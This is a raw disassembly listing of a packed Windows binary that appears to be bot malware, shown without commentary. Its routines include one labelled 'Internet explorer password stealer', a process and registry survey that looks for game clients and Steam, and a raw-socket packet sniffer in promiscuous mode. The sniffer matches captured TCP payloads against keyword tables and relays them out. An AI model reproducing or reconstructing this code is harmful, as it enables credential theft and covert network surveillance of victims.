cmp dword ptr [ebp-0A00h], 0
jz short loc_415ADA
mov eax, [ebp-0A00h]
mov ecx, [ebp-0A00h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415ADA: ; CODE XREF: sub_414EF4+BD2�j
mov eax, [ebp-0FD8h]
loc_415AE0: ; CODE XREF: sub_414EF4+B9�j
; sub_414EF4+19C�j
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
pop edi
pop esi
leave
retn 4
sub_414EF4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415AF0 proc near ; CODE XREF: sub_40A9CF+7F�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp ds:dword_41DF50, 0
jnz short loc_415AFF
jmp short locret_415B3D
; ---------------------------------------------------------------------------
loc_415AFF: ; CODE XREF: sub_415AF0+B�j
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_415B15
jmp short locret_415B3D
; ---------------------------------------------------------------------------
loc_415B15: ; CODE XREF: sub_415AF0+21�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aInternetExplor ; "Internet explorer password stealer"
push 0
push [ebp+var_4]
push offset sub_414EF4
call sub_4095A4
add esp, 10h
locret_415B3D: ; CODE XREF: sub_415AF0+D�j
; sub_415AF0+23�j
leave
retn
sub_415AF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415B3F proc near ; CODE XREF: UPX0:00416FB6�p
; UPX0:00416FBF�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jz short locret_415B5E
mov eax, [ebp+var_4]
mov eax, [eax]
mov ecx, [ebp+var_4]
mov ecx, [ecx]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
locret_415B5E: ; CODE XREF: sub_415B3F+D�j
leave
retn
sub_415B3F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415B60 proc near ; DATA XREF: sub_415DFD+35�o
var_5D8 = dword ptr -5D8h
var_5D4 = dword ptr -5D4h
var_5D0 = dword ptr -5D0h
var_5CC = dword ptr -5CCh
var_5C8 = dword ptr -5C8h
var_5C4 = dword ptr -5C4h
var_5C0 = dword ptr -5C0h
var_5BC = dword ptr -5BCh
var_5B8 = dword ptr -5B8h
var_5B4 = byte ptr -5B4h
var_41C = byte ptr -41Ch
var_410 = dword ptr -410h
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = dword ptr -404h
var_400 = byte ptr -400h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5D8h
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_5B8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
and [ebp+var_5C4], 0
and [ebp+var_410], 0
and [ebp+var_40C], 0
and [ebp+var_408], 0
and [ebp+var_404], 0
and [ebp+var_5BC], 0
jmp short loc_415BC2
; ---------------------------------------------------------------------------
loc_415BB5: ; CODE XREF: sub_415B60:loc_415C50�j
mov eax, [ebp+var_5BC]
inc eax
mov [ebp+var_5BC], eax
loc_415BC2: ; CODE XREF: sub_415B60+53�j
cmp [ebp+var_5BC], 0FFFFh
jnb loc_415C55
push 400h
lea eax, [ebp+var_400]
push eax
push [ebp+var_5BC]
call ds:dword_4171E4 ; GetWindowTextA
push 7
push offset aUnreal3 ; "Unreal3"
lea eax, [ebp+var_400]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_415C0E
mov [ebp+var_410], 1
loc_415C0E: ; CODE XREF: sub_415B60+A2�j
push offset aWorldOfWarcraf ; "World Of Warcraft"
lea eax, [ebp+var_400]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_415C2F
mov [ebp+var_408], 1
loc_415C2F: ; CODE XREF: sub_415B60+C3�j
push offset aConquer ; "[Conquer]"
lea eax, [ebp+var_400]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_415C50
mov [ebp+var_404], 1
loc_415C50: ; CODE XREF: sub_415B60+E4�j
jmp loc_415BB5
; ---------------------------------------------------------------------------
loc_415C55: ; CODE XREF: sub_415B60+6C�j
and [ebp+var_5C0], 0
lea eax, [ebp+var_5C0]
push eax
push 20019h
push 0
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\VisualStudio\\6.0\\Set"...
push 80000002h
call ds:dword_417008 ; RegOpenKeyExA
test eax, eax
jnz short loc_415C88
mov [ebp+var_5C4], 1
loc_415C88: ; CODE XREF: sub_415B60+11C�j
push [ebp+var_5C0]
call ds:dword_417028 ; RegCloseKey
and [ebp+var_5C0], 0
lea eax, [ebp+var_5C0]
push eax
push 20019h
push 0
push offset aSoftwareValveS ; "Software\\Valve\\Steam"
push 80000001h
call ds:dword_417008 ; RegOpenKeyExA
test eax, eax
jnz short loc_415CC7
mov [ebp+var_40C], 1
loc_415CC7: ; CODE XREF: sub_415B60+15B�j
push [ebp+var_5C0]
call ds:dword_417028 ; RegCloseKey
movsx eax, [ebp+var_41C]
test eax, eax
jz short loc_415D1E
cmp [ebp+var_410], 0
jnz short loc_415D1E
cmp [ebp+var_5C4], 0
jnz short loc_415D1E
cmp [ebp+var_40C], 0
jnz short loc_415D1E
cmp [ebp+var_408], 0
jnz short loc_415D1E
cmp [ebp+var_404], 0
jnz short loc_415D1E
push [ebp+var_5B8]
call sub_409763
pop ecx
xor eax, eax
jmp locret_415DF9
; ---------------------------------------------------------------------------
loc_415D1E: ; CODE XREF: sub_415B60+17C�j
; sub_415B60+185�j ...
cmp [ebp+var_404], 0
jz short loc_415D33
mov [ebp+var_5C8], offset aYes ; "Yes"
jmp short loc_415D3D
; ---------------------------------------------------------------------------
loc_415D33: ; CODE XREF: sub_415B60+1C5�j
mov [ebp+var_5C8], offset aNo ; "No"
loc_415D3D: ; CODE XREF: sub_415B60+1D1�j
cmp [ebp+var_408], 0
jz short loc_415D52
mov [ebp+var_5CC], offset aYes ; "Yes"
jmp short loc_415D5C
; ---------------------------------------------------------------------------
loc_415D52: ; CODE XREF: sub_415B60+1E4�j
mov [ebp+var_5CC], offset aNo ; "No"
loc_415D5C: ; CODE XREF: sub_415B60+1F0�j
cmp [ebp+var_40C], 0
jz short loc_415D71
mov [ebp+var_5D0], offset aYes ; "Yes"
jmp short loc_415D7B
; ---------------------------------------------------------------------------
loc_415D71: ; CODE XREF: sub_415B60+203�j
mov [ebp+var_5D0], offset aNo ; "No"
loc_415D7B: ; CODE XREF: sub_415B60+20F�j
cmp [ebp+var_5C4], 0
jz short loc_415D90
mov [ebp+var_5D4], offset aYes ; "Yes"
jmp short loc_415D9A
; ---------------------------------------------------------------------------
loc_415D90: ; CODE XREF: sub_415B60+222�j
mov [ebp+var_5D4], offset aNo ; "No"
loc_415D9A: ; CODE XREF: sub_415B60+22E�j
cmp [ebp+var_410], 0
jz short loc_415DAF
mov [ebp+var_5D8], offset aYes ; "Yes"
jmp short loc_415DB9
; ---------------------------------------------------------------------------
loc_415DAF: ; CODE XREF: sub_415B60+241�j
mov [ebp+var_5D8], offset aNo ; "No"
loc_415DB9: ; CODE XREF: sub_415B60+24D�j
push [ebp+var_5C8]
push [ebp+var_5CC]
push [ebp+var_5D0]
push [ebp+var_5D4]
push [ebp+var_5D8]
push offset dword_41D67C
lea eax, [ebp+var_5B4]
push eax
call sub_40D53F
add esp, 1Ch
push [ebp+var_5B8]
call sub_409763
pop ecx
xor eax, eax
locret_415DF9: ; CODE XREF: sub_415B60+1B9�j
leave
retn 4
sub_415B60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415DFD proc near ; CODE XREF: sub_40A9CF+12FF�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_415E17
jmp short locret_415E3F
; ---------------------------------------------------------------------------
loc_415E17: ; CODE XREF: sub_415DFD+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aListingInteres ; "Listing interesting processes"
push 0
push [ebp+var_4]
push offset sub_415B60
call sub_4095A4
add esp, 10h
locret_415E3F: ; CODE XREF: sub_415DFD+18�j
leave
retn
sub_415DFD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415E41 proc near ; CODE XREF: sub_415EB7+37�p
; sub_415EB7+59�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_415E52
; ---------------------------------------------------------------------------
loc_415E4B: ; CODE XREF: sub_415E41+69�j
; sub_415E41:loc_415EB1�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_415E52: ; CODE XREF: sub_415E41+8�j
mov eax, [ebp+var_4]
shl eax, 1
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+eax*4], 0
jz short loc_415EB3
mov eax, [ebp+var_4]
shl eax, 1
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_407ACA
add esp, 0Ch
test eax, eax
jz short loc_415EB1
mov eax, [ebp+var_4]
shl eax, 1
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+eax*4+4], 0
jz short loc_415EAC
mov eax, [ebp+var_4]
shl eax, 1
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_407ACA
add esp, 0Ch
test eax, eax
jz short loc_415EAC
jmp short loc_415E4B
; ---------------------------------------------------------------------------
loc_415EAC: ; CODE XREF: sub_415E41+49�j
; sub_415E41+67�j
push 1
pop eax
jmp short locret_415EB5
; ---------------------------------------------------------------------------
loc_415EB1: ; CODE XREF: sub_415E41+3A�j
jmp short loc_415E4B
; ---------------------------------------------------------------------------
loc_415EB3: ; CODE XREF: sub_415E41+1D�j
xor eax, eax
locret_415EB5: ; CODE XREF: sub_415E41+6E�j
leave
retn
sub_415E41 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415EB7 proc near ; CODE XREF: sub_415F69+420�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp [ebp+arg_C], 0
jz short loc_415EDD
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_407ACA
add esp, 0Ch
test eax, eax
jz short loc_415EDD
push 1
pop eax
jmp loc_415F67
; ---------------------------------------------------------------------------
loc_415EDD: ; CODE XREF: sub_415EB7+7�j
; sub_415EB7+1C�j
cmp [ebp+arg_8], 1
jb short loc_415EFF
push [ebp+arg_4]
push [ebp+arg_0]
push offset off_41D7AC
call sub_415E41
add esp, 0Ch
test eax, eax
jz short loc_415EFF
push 1
pop eax
jmp short loc_415F67
; ---------------------------------------------------------------------------
loc_415EFF: ; CODE XREF: sub_415EB7+2A�j
; sub_415EB7+41�j
cmp [ebp+arg_8], 2
jb short loc_415F21
push [ebp+arg_4]
push [ebp+arg_0]
push offset off_41D808
call sub_415E41
add esp, 0Ch
test eax, eax
jz short loc_415F21
push 1
pop eax
jmp short loc_415F67
; ---------------------------------------------------------------------------
loc_415F21: ; CODE XREF: sub_415EB7+4C�j
; sub_415EB7+63�j
cmp [ebp+arg_8], 3
jb short loc_415F43
push [ebp+arg_4]
push [ebp+arg_0]
push offset off_41D87C
call sub_415E41
add esp, 0Ch
test eax, eax
jz short loc_415F43
push 1
pop eax
jmp short loc_415F67
; ---------------------------------------------------------------------------
loc_415F43: ; CODE XREF: sub_415EB7+6E�j
; sub_415EB7+85�j
cmp [ebp+arg_8], 4
jb short loc_415F65
push [ebp+arg_4]
push [ebp+arg_0]
push offset off_41D8C0
call sub_415E41
add esp, 0Ch
test eax, eax
jz short loc_415F65
push 1
pop eax
jmp short loc_415F67
; ---------------------------------------------------------------------------
loc_415F65: ; CODE XREF: sub_415EB7+90�j
; sub_415EB7+A7�j
xor eax, eax
loc_415F67: ; CODE XREF: sub_415EB7+21�j
; sub_415EB7+46�j ...
pop ebp
retn
sub_415EB7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415F69 proc near ; DATA XREF: sub_41665C+A6�o
var_19B8 = dword ptr -19B8h
var_19B4 = byte ptr -19B4h
var_18B4 = dword ptr -18B4h
var_18B0 = byte ptr -18B0h
var_17B0 = dword ptr -17B0h
var_17AC = dword ptr -17ACh
var_17A8 = byte ptr -17A8h
var_1628 = dword ptr -1628h
var_1624 = dword ptr -1624h
var_1620 = byte ptr -1620h
var_161C = dword ptr -161Ch
var_1618 = dword ptr -1618h
var_1614 = dword ptr -1614h
var_1610 = dword ptr -1610h
var_160C = byte ptr -160Ch
var_140C = byte ptr -140Ch
var_127E = byte ptr -127Eh
var_1278 = byte ptr -1278h
var_1274 = byte ptr -1274h
var_1268 = word ptr -1268h
var_1264 = byte ptr -1264h
var_1263 = byte ptr -1263h
var_125C = dword ptr -125Ch
var_1258 = word ptr -1258h
var_1254 = byte ptr -1254h
var_1154 = dword ptr -1154h
var_1150 = dword ptr -1150h
var_114C = byte ptr -114Ch
var_114B = byte ptr -114Bh
var_104C = dword ptr -104Ch
var_1048 = word ptr -1048h
var_1044 = dword ptr -1044h
var_1038 = byte ptr -1038h
var_1037 = byte ptr -1037h
var_1030 = byte ptr -1030h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 19B8h
call sub_416BC0
push edi
push 3ABh
push [ebp+arg_0]
lea eax, [ebp+var_1614]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
movsx eax, [ebp+var_160C]
neg eax
sbb eax, eax
lea ecx, [ebp+var_160C]
and eax, ecx
mov [ebp+var_1624], eax
push 0
push 3
push 2
call ds:dword_417218 ; socket
mov [ebp+var_104C], eax
cmp [ebp+var_104C], 0FFFFFFFFh
jnz short loc_415FDE
push [ebp+var_1614]
call sub_409763
pop ecx
xor eax, eax
jmp loc_416657
; ---------------------------------------------------------------------------
loc_415FDE: ; CODE XREF: sub_415F69+60�j
push 0FFh
lea eax, [ebp+var_1254]
push eax
call ds:dword_417260 ; gethostname
lea eax, [ebp+var_1254]
push eax
call ds:dword_41723C ; gethostbyname
mov [ebp+var_1154], eax
cmp [ebp+var_1154], 0
jnz short loc_41602B
push [ebp+var_104C]
call ds:dword_417230 ; closesocket
push [ebp+var_1614]
call sub_409763
pop ecx
xor eax, eax
jmp loc_416657
; ---------------------------------------------------------------------------
loc_41602B: ; CODE XREF: sub_415F69+A1�j
push 10h
push 0
lea eax, [ebp+var_1048]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_1048], 2
mov eax, [ebp+var_1154]
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_1044], eax
push 10h
lea eax, [ebp+var_1048]
push eax
push [ebp+var_104C]
call ds:dword_417208 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_416093
push [ebp+var_104C]
call ds:dword_417230 ; closesocket
push [ebp+var_1614]
call sub_409763
pop ecx
xor eax, eax
jmp loc_416657
; ---------------------------------------------------------------------------
loc_416093: ; CODE XREF: sub_415F69+109�j
mov [ebp+var_1150], 1
push 0
push 0
lea eax, [ebp+var_1620]
push eax
push 0
push 0
push 4
lea eax, [ebp+var_1150]
push eax
push 98000001h
push [ebp+var_104C]
call ds:dword_41725C ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_4160EA
push [ebp+var_104C]
call ds:dword_417230 ; closesocket
push [ebp+var_1614]
call sub_409763
pop ecx
xor eax, eax
jmp loc_416657
; ---------------------------------------------------------------------------
loc_4160EA: ; CODE XREF: sub_415F69+160�j
lea eax, [ebp+var_1030]
mov [ebp+var_161C], eax
and [ebp+var_1628], 0
and [ebp+var_4], 0
push [ebp+var_1610]
mov eax, [ebp+var_1614]
push dword ptr [eax]
push offset unk_41DA8C
lea eax, [ebp+var_140C]
push eax
call sub_40D53F
add esp, 10h
and [ebp+var_1274], 0
and [ebp+var_114C], 0
push 3Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_114B]
rep stosd
stosw
stosb
and [ebp+var_1264], 0
xor eax, eax
lea edi, [ebp+var_1263]
stosd
stosb
lea eax, [ebp+var_114C]
push eax
call sub_40CF25
push eax
call sub_4044F7
pop ecx
pop ecx
lea eax, [ebp+var_1264]
push eax
call sub_40CF25
push eax
call sub_4045B2
pop ecx
pop ecx
lea eax, [ebp+var_114C]
push eax
call ds:dword_417244 ; inet_addr
mov [ebp+var_1618], eax
lea eax, [ebp+var_1264]
push eax
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_1268], ax
and [ebp+var_1038], 0
xor eax, eax
lea edi, [ebp+var_1037]
stosd
stosb
lea eax, [ebp+var_1038]
push eax
call sub_40CF25
push eax
call sub_404552
pop ecx
pop ecx
mov eax, [ebp+var_1044]
mov [ebp+var_125C], eax
lea eax, [ebp+var_1038]
push eax
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_1258], ax
loc_4161E6: ; CODE XREF: sub_415F69+305�j
; sub_415F69+33A�j ...
push 0
push 1028h
lea eax, [ebp+var_1030]
push eax
push [ebp+var_104C]
call ds:dword_417248 ; recv
mov [ebp+var_17AC], eax
mov eax, [ebp+var_1614]
cmp dword ptr [eax+4], 0
jz short loc_416217
jmp loc_416637
; ---------------------------------------------------------------------------
loc_416217: ; CODE XREF: sub_415F69+2A7�j
cmp [ebp+var_17AC], 0FFFFFFFFh
jz short loc_416229
cmp [ebp+var_17AC], 0
jnz short loc_41622E
loc_416229: ; CODE XREF: sub_415F69+2B5�j
jmp loc_416637
; ---------------------------------------------------------------------------
loc_41622E: ; CODE XREF: sub_415F69+2BE�j
mov eax, [ebp+var_17AC]
and [ebp+eax+var_1030], 0
mov eax, [ebp+var_161C]
mov al, [eax]
and al, 0Fh
movzx eax, al
mov ecx, [ebp+var_161C]
lea eax, [ecx+eax*4]
mov [ebp+var_1628], eax
mov eax, [ebp+var_1628]
lea ecx, [ebp+var_1030]
sub eax, ecx
cmp eax, [ebp+var_17AC]
jb short loc_416273
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_416273: ; CODE XREF: sub_415F69+303�j
mov eax, [ebp+var_1628]
mov al, [eax+0Ch]
shr al, 4
and al, 0Fh
movzx eax, al
mov ecx, [ebp+var_1628]
lea eax, [ecx+eax*4]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
lea ecx, [ebp+var_1030]
sub eax, ecx
cmp eax, [ebp+var_17AC]
jb short loc_4162A8
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_4162A8: ; CODE XREF: sub_415F69+338�j
push [ebp+var_4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_17AC], eax
mov eax, [ebp+var_161C]
movzx eax, byte ptr [eax+9]
cmp eax, 6
jnz loc_416632
movsx eax, [ebp+var_127E]
test eax, eax
jz short loc_4162EB
mov eax, [ebp+var_161C]
mov eax, [eax+10h]
cmp eax, [ebp+var_125C]
jz short loc_4162EB
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_4162EB: ; CODE XREF: sub_415F69+36A�j
; sub_415F69+37B�j
movsx eax, [ebp+var_1278]
test eax, eax
jz short loc_41630C
mov eax, [ebp+var_161C]
mov eax, [eax+0Ch]
cmp eax, [ebp+var_125C]
jz short loc_41630C
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_41630C: ; CODE XREF: sub_415F69+38B�j
; sub_415F69+39C�j
mov eax, [ebp+var_1628]
mov ax, [eax]
push eax
call ds:dword_417238 ; htons
movzx eax, ax
movzx ecx, [ebp+var_1258]
cmp eax, ecx
jnz short loc_416340
mov eax, [ebp+var_161C]
mov eax, [eax+0Ch]
cmp eax, [ebp+var_125C]
jnz short loc_416340
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_416340: ; CODE XREF: sub_415F69+3BF�j
; sub_415F69+3D0�j
mov eax, [ebp+var_1628]
mov ax, [eax]
push eax
call ds:dword_417238 ; htons
movzx eax, ax
movzx ecx, [ebp+var_1268]
cmp eax, ecx
jnz short loc_416374
mov eax, [ebp+var_161C]
mov eax, [eax+0Ch]
cmp eax, [ebp+var_1618]
jnz short loc_416374
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_416374: ; CODE XREF: sub_415F69+3F3�j
; sub_415F69+404�j
push [ebp+var_1624]
push [ebp+var_1610]
push [ebp+var_17AC]
push [ebp+var_4]
call sub_415EB7
add esp, 10h
test eax, eax
jz loc_416632
and [ebp+var_19B8], 0
jmp short loc_4163AF
; ---------------------------------------------------------------------------
loc_4163A2: ; CODE XREF: sub_415F69:loc_416413�j
mov eax, [ebp+var_19B8]
inc eax
mov [ebp+var_19B8], eax
loc_4163AF: ; CODE XREF: sub_415F69+437�j
mov eax, [ebp+var_19B8]
cmp eax, [ebp+var_17AC]
jnb short loc_416415
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
cmp eax, 0Dh
jnz short loc_4163DA
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
mov byte ptr [eax], 2Dh
loc_4163DA: ; CODE XREF: sub_415F69+463�j
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
cmp eax, 0Ah
jnz short loc_4163F7
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
mov byte ptr [eax], 3Eh
loc_4163F7: ; CODE XREF: sub_415F69+480�j
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_416413
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
mov byte ptr [eax], 2Eh
loc_416413: ; CODE XREF: sub_415F69+49C�j
jmp short loc_4163A2
; ---------------------------------------------------------------------------
loc_416415: ; CODE XREF: sub_415F69+452�j
and [ebp+var_19B8], 0
mov eax, [ebp+var_19B8]
mov [ebp+var_17AC], eax
jmp short loc_416437
; ---------------------------------------------------------------------------
loc_41642A: ; CODE XREF: sub_415F69+507�j
; sub_415F69+51A�j ...
mov eax, [ebp+var_19B8]
inc eax
mov [ebp+var_19B8], eax
loc_416437: ; CODE XREF: sub_415F69+4BF�j
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_41645F
mov eax, [ebp+var_4]
add eax, [ebp+var_17AC]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_19B8]
mov cl, [ecx]
mov [eax], cl
jmp short loc_4164AA
; ---------------------------------------------------------------------------
loc_41645F: ; CODE XREF: sub_415F69+4DC�j
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
cmp eax, 7Fh
jl short loc_416472
jmp short loc_41642A
; ---------------------------------------------------------------------------
loc_416472: ; CODE XREF: sub_415F69+505�j
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
cmp eax, 1Fh
jg short loc_416485
jmp short loc_41642A
; ---------------------------------------------------------------------------
loc_416485: ; CODE XREF: sub_415F69+518�j
mov eax, [ebp+var_4]
add eax, [ebp+var_17AC]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_19B8]
mov cl, [ecx]
mov [eax], cl
mov eax, [ebp+var_17AC]
inc eax
mov [ebp+var_17AC], eax
jmp short loc_41642A
; ---------------------------------------------------------------------------
loc_4164AA: ; CODE XREF: sub_415F69+4F4�j
cmp [ebp+var_17AC], 0
jnz short loc_4164B8
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_4164B8: ; CODE XREF: sub_415F69+548�j
push 100h
mov eax, [ebp+var_161C]
push dword ptr [eax+0Ch]
call ds:dword_41721C ; inet_ntoa
push eax
lea eax, [ebp+var_19B4]
push eax
call sub_407A56
add esp, 0Ch
push 100h
mov eax, [ebp+var_161C]
push dword ptr [eax+10h]
call ds:dword_41721C ; inet_ntoa
push eax
lea eax, [ebp+var_18B0]
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp+var_1628]
mov ax, [eax+2]
push eax
call ds:dword_417238 ; htons
movzx eax, ax
push eax
lea eax, [ebp+var_18B0]
push eax
mov eax, [ebp+var_1628]
mov ax, [eax]
push eax
call ds:dword_417238 ; htons
movzx eax, ax
push eax
lea eax, [ebp+var_19B4]
push eax
push offset dword_41DA58
lea eax, [ebp+var_17A8]
push eax
call sub_416B5E ; sprintf
add esp, 18h
mov [ebp+var_18B4], eax
mov eax, 180h
sub eax, [ebp+var_18B4]
push eax
push [ebp+var_4]
mov eax, [ebp+var_18B4]
lea eax, [ebp+eax+var_17A8]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_17A8]
push eax
push offset dword_418B64
lea eax, [ebp+var_140C]
push eax
call sub_40D53F
add esp, 0Ch
push 3E8h
call ds:dword_41709C ; Sleep
mov eax, [ebp+var_1614]
cmp dword ptr [eax+4], 0
jz short loc_4165AD
jmp loc_416655
; ---------------------------------------------------------------------------
loc_4165AD: ; CODE XREF: sub_415F69+63D�j
mov eax, 180h
sub eax, [ebp+var_18B4]
dec eax
mov [ebp+var_17B0], eax
loc_4165BF: ; CODE XREF: sub_415F69+6C7�j
mov eax, [ebp+var_17B0]
cmp eax, [ebp+var_17AC]
jnb short loc_416632
push 180h
mov eax, [ebp+var_4]
add eax, [ebp+var_17B0]
push eax
lea eax, [ebp+var_17A8]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_17A8]
push eax
push offset dword_418B64
lea eax, [ebp+var_140C]
push eax
call sub_40D53F
add esp, 0Ch
push 3E8h
call ds:dword_41709C ; Sleep
mov eax, [ebp+var_1614]
cmp dword ptr [eax+4], 0
jz short loc_41661F
jmp short loc_416653
; ---------------------------------------------------------------------------
loc_41661F: ; CODE XREF: sub_415F69+6B2�j
mov eax, [ebp+var_17B0]
add eax, 17Fh
mov [ebp+var_17B0], eax
jmp short loc_4165BF
; ---------------------------------------------------------------------------
loc_416632: ; CODE XREF: sub_415F69+35B�j
; sub_415F69+42A�j ...
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_416637: ; CODE XREF: sub_415F69+2A9�j
; sub_415F69:loc_416229�j ...
push [ebp+var_104C]
call ds:dword_417230 ; closesocket
push [ebp+var_1614]
call sub_409763
pop ecx
xor eax, eax
jmp short loc_416657
; ---------------------------------------------------------------------------
loc_416653: ; CODE XREF: sub_415F69+6B4�j
jmp short loc_416637
; ---------------------------------------------------------------------------
loc_416655: ; CODE XREF: sub_415F69+63F�j
jmp short loc_416637
; ---------------------------------------------------------------------------
loc_416657: ; CODE XREF: sub_415F69+70�j
; sub_415F69+BD�j ...
pop edi
leave
retn 4
sub_415F69 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41665C proc near ; CODE XREF: sub_40A9CF+9FE�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push 3ABh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_41667B
jmp locret_41670F
; ---------------------------------------------------------------------------
loc_41667B: ; CODE XREF: sub_41665C+18�j
cmp [ebp+arg_4], 0
jz short loc_41668F
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
jmp short loc_416696
; ---------------------------------------------------------------------------
loc_41668F: ; CODE XREF: sub_41665C+23�j
mov [ebp+var_8], 3
loc_416696: ; CODE XREF: sub_41665C+31�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_8]
mov [eax+4], ecx
cmp [ebp+arg_8], 0
jz short loc_4166AD
mov eax, [ebp+arg_8]
mov [ebp+var_C], eax
jmp short loc_4166B4
; ---------------------------------------------------------------------------
loc_4166AD: ; CODE XREF: sub_41665C+47�j
mov [ebp+var_C], offset byte_41DF00
loc_4166B4: ; CODE XREF: sub_41665C+4F�j
push 200h
push [ebp+var_C]
mov eax, [ebp+var_4]
add eax, 8
push eax
call sub_407A56
add esp, 0Ch
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 208h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_4]
push dword ptr [eax+4]
push offset dword_41DAC0
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_4]
push offset sub_415F69
call sub_4095A4
add esp, 14h
locret_41670F: ; CODE XREF: sub_41665C+1A�j
leave
retn
sub_41665C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416711 proc near ; CODE XREF: sub_4167B9+6�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push offset aRb ; "rb"
push [ebp+arg_0]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41673B
push [ebp+var_4]
call sub_416B82 ; fclose
pop ecx
